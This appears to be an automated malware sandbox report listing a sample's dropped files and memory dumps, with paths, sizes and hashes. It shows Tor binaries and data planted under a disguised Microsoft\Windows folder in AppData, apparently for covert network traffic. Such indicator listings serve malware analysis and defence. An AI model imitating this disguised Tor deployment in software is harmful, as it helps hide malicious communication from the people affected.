Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs

Filesize
20KB

MD5
24968f272bf5bb77011cbfcc45bf7e9b

SHA1
b4399c0aafbdb4b1ff4e612b9d7eb63227009f86

SHA256
c914692b4647364fa71850834540acc6056b5fc188c06964d04cc4becc4cd388

SHA512
9a07a3a2fda086189cf4bebc534c51d6dd76fdfa510ebb851182a8560ef5d9fc7262db9c0f0825801686e756ae4a8b639541de6b86cae57901117dce353d90f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus.tmp

Filesize
2.6MB

MD5
e13087afdd97478f0f0ba726909f39fa

SHA1
8d2c240420e8c4156aed51dbc509b0231b70a8e8

SHA256
23cbf2a33f1372cfee2f8a6db64a50faa05c7ef81670a2914f3e4fde00f15ccc

SHA512
3375e5fc7cc6dd5fa70a81a634638c297709403e4c4e8de8ef74cc5df9dd9ddd28587e96187aca1258506ea799b80aa3e01ae71811132f7e3dfa5ac66c579908

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
5.7MB

MD5
474678fce5dc482561edca817de80305

SHA1
00633296dd17b3384f7c91812abfabfbb83859a8

SHA256
e17293fff407bfd855ae826d826a1c419b1381e165355def47c68783a607d4c5

SHA512
fc32a2bb2a6789bce2b37121f34c06e6569e32934754fa1092a48720ee91faa9e0c63c6a8d6f34d67549a9afe62912cbc401ed293b1f6fdac8476c58aa0cf718

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

Filesize
20.1MB

MD5
4edf0a9bc6bf9ef5c2dce44ad743638a

SHA1
21f48b9608c7cc6ad5fd208ebfb509bd58638ead

SHA256
89df1020a0660aca470fb27f28318189b8fb34239e3699f3f1e730f819be8019

SHA512
cecab70eca5067658e3030c552a165d63fd9d78ff8f4c8eab5ada4db0b65cdcab8dca553899fac6a0e33c8ccf082838f0c24294ea04aba5b1ab2ee573ac2df66

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\state

Filesize
4KB

MD5
f227c32622e8e28ea8bcdb11799b3140

SHA1
1903cdf8dda7149a943c5cd2ccf9f9a6eae9bbd3

SHA256
41a217eb33343ad49a61ae045a769fd4dd970b430e533020e1e73d594c19d742

SHA512
d908569ce959d39438bb30eb7b1a0f74ea230b4aa455ab8b272c2e563afc770fe9097c67f696902055acb6d951e0feb924e03f3fd5d6ca2c654caeafaa64d81f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\Tor.pid

Filesize
6B

MD5
01da8593acb0f7310ffce5fe24e453a3

SHA1
175e6e75bde2d1186a158eb35e6ba16d5e84358e

SHA256
c4a859cd834f93321f56cd33177f2d5890d2a57729fd1bf31629eaf89f179d9a

SHA512
6a30d2c63ee48df91e5ccfd924db28fde49d51c47a0a2b3d77e68bac1bfab595774f758cd306f9c6cb5134a8e846b0c421ffca51ddd74a00db3e57a0c7fa30fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\TorConfig

Filesize
201B

MD5
b9d2fe9cfa840518fa39039c928d4938

SHA1
0561516b7cfa784cf400349983817c8b18817256

SHA256
69d57bfb46ef8097c1cfca65885790421d0e0965b7778f165cd7df9368807776

SHA512
894510d39a044a37325d73b8348860960b3a78c54e7cdf81357f4b50e8dcf5d47ab98c768e6439949ba835802b2a5e98314441127d9655b027caf246e09e013d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

Filesize
3.4MB

MD5
791a48e7cf84ec1532d20127556f6300

SHA1
774f71e595cfc7e24dc941839566bc9edd9156c5

SHA256
af682ad107cf0e9d9f11adeaf88f817610988b56577c4020897debc0f98e26ff

SHA512
ecbb4a07bb68fec5258be0adc91b89d179b5668bbab3be3bd72d5339f8bf3b32a1860b38693a304029fe989bd92adb020cf755f673b1e59966dfc75e4f958cfa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

Filesize
974KB

MD5
be51ba4bea2d731dacf974c43941e457

SHA1
51fc479fd8ee9a2b72e6aa020ce5bb1c7a28f621

SHA256
98d06628e3d9c8097d239722e83ad78eb0b41b1e2f54d50a500da6d9292ff747

SHA512
6184accd206aa466278c2f4b514fd5c85820d47cf3a148904e93927621ac386890e657f09547b694c32ef23c355ae738b7c7d039fcd6c791529198c7b0b6bd1e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_core-2-1-7.dll

Filesize
646KB

MD5
c1507e234ff7f11a259d87a57af740be

SHA1
7478ba561c9f478ede650561867ebd2db58da42f

SHA256
d6a7d46f6fc803b50460d03c0bc14f2f128ee2becabcf1713715bcebf13ee75b

SHA512
64d0657050028d846097429ad1268844038059279e1256329716b937338de5fc1b5f50f420b8aa781c5e2a19f15158f564569db639981fef10fa5e57dfd4717b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent_extra-2-1-7.dll

Filesize
657KB

MD5
7cb2f0f4bba8d16c3200e9ac2a25b7c0

SHA1
63cf39682bf6876f563e1567df3c55fd5939e6ea

SHA256
ec52e90c68dd0e7603df3f9fe6c909d019a7e94dc3ce0efd8baf67864a43b74b

SHA512
7a660d87739914c68cadb56a4acbf27d68fd145b3bb65b957b4c767dfabe0762c40d58faa3a2df3b3453083ea658411c79d53be5166dda844782a9cd2617a264

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
ead6d4a87041e13b9041f78be1cb84d1

SHA1
896a336e08a1904537ee5a4a86eb0e885a18e17a

SHA256
b94b8981f8110944c5b03c9cba4066e9d0daa13687dead387bcbc772132c6d24

SHA512
34054ec79691145a8d511f9425f9ad44e07f8bfb38bd0b3251a5db3358c0055344615990fb770d4bdcbf04c9461847dfd4f6d2bac1e43ec815426a94d065c580

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssl-1_1-x64.dll

Filesize
965KB

MD5
7847c7b13b3414e8e7652880b4609205

SHA1
930670acc16157f56aaf69423e5d7705441764ba

SHA256
38200438cf0c9c20d17e5b9030d2ad2e4a1b6b9dc41c287bc603dd50d22e67bb

SHA512
c3c81dc3eb546c40b3606338deadbd63331659645dd24b5fd0d4fb3170b053fef528ee3fe005c9446176a5c049e9412ea8193ad2f8b9a7301ff67b088f1bbb6e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libwinpthread-1.dll

Filesize
608KB

MD5
624304f2ba253b33c265ff2738a10eb9

SHA1
5a337e49dd07f0b6f7fc6341755dc9a298e8b220

SHA256
27b857131977106c4a71ce626225d52a3d6e2932cb6243cb83e47b8d592d0d4f

SHA512
163820961a64b3fda33969cbb320aa743edc7a6bacebe033054c942e7a1d063f096290a59fad1569c607666429e2f3133fcfe31ef37649f9da71b453ef775e5a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe

Filesize
4.3MB

MD5
9f2d86da7d58a70b0003307d9cfc2438

SHA1
bd69ad6ea837e309232d7c4fd0e87e22c3266ac5

SHA256
7052619814a614a1b157c5c94a92dbec22b425a0977ac8b21958b8db81e2dd65

SHA512
ce345ff77d8043f416a04b782be8e7b0d5fdea933f3ac79abb88648a9fca23d7a69f537a825d0b636ba64f80afe70f758114ddbf412bd9398800ba4b6e359a99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\zlib1.dll

Filesize
107KB

MD5
d490b6c224e332a706dd3cd210f32aa8

SHA1
1f0769e1fffddac3d14eb79f16508cb6cc272347

SHA256
da9185e45fdcbee17fcd9292979b20f32aa4c82bc2cb356b4c7278029e247557

SHA512
43ce8d4ee07d437aaca3f345af129ff5401f1f08b1292d1e320096ba41e2529f41ce9105e3901cb4ecb1e8fde12c9298819961b0e6896c69b62f5983df9b0da3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libssp-0.dll

Filesize
313KB

MD5
97d89dec5f6a236b6832a5f3f43ab625

SHA1
18f2696a3bf4d19cac3b677d58ff5e51bf54b9e8

SHA256
c6dca12e0e896df5f9b2db7a502a50d80d4fb014d7ec2f2ceb897b1a81f46ead

SHA512
7e82d1e37dc822a67e08bd1d624d5492f5813a33ec64f13d22caef9db35ebb9bb9913582289ebdecad00e6b6148d750ae0b4437364ef056d732734255498be54

Download Submit
memory/320-59-0x0000000000580000-0x00000000006A3000-memory.dmp

Filesize
1.1MB

Download
memory/320-62-0x0000000000580000-0x00000000006A3000-memory.dmp

Filesize
1.1MB

Download
memory/320-61-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/320-65-0x0000000000580000-0x00000000006A3000-memory.dmp

Filesize
1.1MB

Download
memory/2208-42-0x00000000003F0000-0x0000000002C73000-memory.dmp

Filesize
40.5MB

Download
memory/2208-46-0x00000000003F0000-0x0000000002C73000-memory.dmp

Filesize
40.5MB

Download
memory/2208-3-0x00000000000F0000-0x00000000000F1000-memory.dmp

Filesize
4KB

Download
memory/2208-1-0x00000000000F0000-0x00000000000F1000-memory.dmp

Filesize
4KB

Download
memory/2208-5-0x00000000000F0000-0x00000000000F1000-memory.dmp

Filesize
4KB

Download
memory/2208-6-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/2208-8-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/2208-10-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/2208-49-0x00000000003F0000-0x0000000002C73000-memory.dmp

Filesize
40.5MB

Download
memory/2208-48-0x00000000004B8000-0x00000000007FF000-memory.dmp

Filesize
3.3MB

Download
memory/2208-15-0x00000000003F0000-0x0000000002C73000-memory.dmp

Filesize
40.5MB

Download
memory/2208-14-0x00000000003F0000-0x0000000002C73000-memory.dmp

Filesize
40.5MB

Download
memory/2208-47-0x00000000003F0000-0x0000000002C73000-memory.dmp

Filesize
40.5MB

Download
memory/2208-0-0x00000000004B8000-0x00000000007FF000-memory.dmp

Filesize
3.3MB

Download
memory/2284-111-0x0000000075110000-0x00000000751F3000-memory.dmp

Filesize
908KB

Download
memory/2284-113-0x0000000075010000-0x00000000750A8000-memory.dmp

Filesize
608KB

Download
memory/2284-865-0x0000000000CA0000-0x0000000001101000-memory.dmp

Filesize
4.4MB

Download
memory/2284-114-0x0000000074830000-0x0000000074B1D000-memory.dmp

Filesize
2.9MB

Download
memory/2284-116-0x0000000074F00000-0x0000000074F23000-memory.dmp

Filesize
140KB

Download
memory/2284-483-0x0000000000CA0000-0x0000000001101000-memory.dmp

Filesize
4.4MB

Download
memory/2284-148-0x0000000000CA0000-0x0000000001101000-memory.dmp

Filesize
4.4MB

Download
memory/2284-130-0x0000000000CA0000-0x0000000001101000-memory.dmp

Filesize
4.4MB

Download
memory/2284-110-0x0000000000CA0000-0x0000000001101000-memory.dmp

Filesize
4.4MB

Download
memory/2284-112-0x00000000750B0000-0x0000000075104000-memory.dmp

Filesize
336KB

Download
memory/2284-2666-0x0000000000CA0000-0x0000000001101000-memory.dmp

Filesize
4.4MB

Download
memory/2284-115-0x0000000074F30000-0x0000000075003000-memory.dmp

Filesize
844KB

Download
memory/2340-3235-0x0000000000060000-0x0000000000183000-memory.dmp

Filesize
1.1MB

Download
memory/2340-3234-0x000007FFFFFD3000-0x000007FFFFFD4000-memory.dmp

Filesize
4KB

Download